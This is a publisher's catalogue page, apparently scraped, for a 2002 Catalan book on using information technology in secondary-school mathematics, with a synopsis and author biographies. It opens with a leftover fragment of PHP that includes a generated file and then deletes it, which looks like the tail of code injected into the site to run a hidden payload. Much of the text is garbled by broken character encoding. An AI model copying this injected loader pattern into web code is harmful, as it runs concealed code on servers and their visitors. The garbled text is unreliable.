");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Les tecnologies de la informaciˇ a la classe de matemÓtiques
Cercador d'Obres
ORDENAR:
Començar recerca

Les tecnologies de la informaciˇ a la classe de matemÓtiques

CortŔs Mˇra, Rafel; Martorell Fullana, Miquel

Col·lecció:
DidÓctica
Tema:

Pàgines:
134
PVP:
11.00
ISBN:
84-95694-22-0
Data d'Edició:
14/05/2002
Sinopsi
Conjunt ampli i variat de propostes per treballar el currÝculum de matemÓtiques de lĺeducaciˇ secundÓria fent servir lĺordinador, basades en tres Órees concretes:la geometria, lĺestadÝstica i el tractament de lĺatzar.
Rafel CortŔs Mˇra
(Sˇller, 1957), matemÓtic. Llicenciat (1979) en ciŔncies matemÓtiques per la Universitat Aut˛noma de Barcelona. ╔s coordinador (des de 1998) del projecte d'Integraciˇ de les Teconologies de la Informaciˇ i la Comunicaciˇ (TIC) als centrres d'Educaciˇ PrimÓria i SecundÓria de la Conselleria d'Educaciˇ del Govern de les Illes Balears.
Miquel Martorell Fullana
Llicenciat en ciŔncies matemÓtiques (UAB) i professor de llengua catalana de les Illes Balears (ICE-UIB). CatedrÓtic de l’Órea de matemÓtiques de secundÓria a l’IES Llucmajor. Ha impartit docŔncia als centres l’IB Egara de Sabadell %u2013 Terrassa, l'IB M¬ Ant˛nia SalvÓ i al Departament de CiŔncies MatemÓtiques i InformÓtica de la UIB.
Recomanar
Comentar
Comentaris (0)